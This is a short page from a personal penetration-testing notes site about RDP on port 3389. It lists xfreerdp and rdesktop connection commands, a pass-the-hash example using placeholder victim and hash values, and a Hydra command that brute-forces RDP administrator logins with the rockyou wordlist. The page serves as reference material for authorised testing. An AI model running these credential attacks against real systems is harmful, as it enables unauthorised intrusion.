My Pentesting Space
LinkedIn
  • Welcome to Hackjiji
  • 🕸️web pentesting
    • Basics
    • Web pentest cheatsheet
    • Burpsuite and browser tricks
    • cUrl cheatsheet
    • CVE exploitation
    • JavaScript Obfuscation/Deobfuscation
  • Network pentesting
    • Basics
    • Nmap favorites
    • Host discovery
    • Port scanning
    • Network Services
      • RPC-NFC
      • WINRM - 5895-5896
      • FTP - 21
      • SMB - 445
      • RDP - 3389
      • SSH - 22
      • SMTP - 25
    • Firewall evasion
    • Pivoting and double pivoting
  • Physical pentesting
    • Bad USB - Rubber Duckies
  • Linux pentesting
    • Usefull command's
    • Privilege escalation
  • windows pentesting
    • Windows useful commands
    • Windows Reverse shell codes
    • Privilege escalation
  • Active Directory pentesting
    • Basics
    • AD
    • AAD
  • General
    • Hash cracking
    • Wordlist
    • Encoding/decoding
    • Environment setup
      • Install a new OS on seperated boot sector
      • Hyper-V
      • Virtualbox
    • Reverse-shell-cheatsheet
    • Metasploit cheatsheet
    • Vulnerability research
    • My scanning methodology
  • Events
    • HackTheBox Meetup - LFI2RCE
    • Radio Equans - QR Code Awareness campaign
    • Cybersecurity job campaign
Powered by GitBook
On this page
  • RDP
  • RDP Bruteforcing
  1. Network pentesting
  2. Network Services

RDP - 3389

RDP

#Establish RDP connection using xfreerdp displaying domain and credentials
xfreerdp /d:WIN-MI13LMC968D /u:administrator /p:iloveu /cert-ignore /v:192.168.25.110

# Launch RDP from Linux using Remmina
Remmina

# Pass-the-hash attack example using xfreerdp
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

# Connect RDP using rdesktop with username and password
rdesktop -u username -p password 192.168.1.12

RDP Bruteforcing

  • Hydra Command: Use Hydra for RDP brute forcing with administrator credentials.

    hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://192.168.1.1
    

PreviousSMB - 445NextSSH - 22

Last updated 6 months ago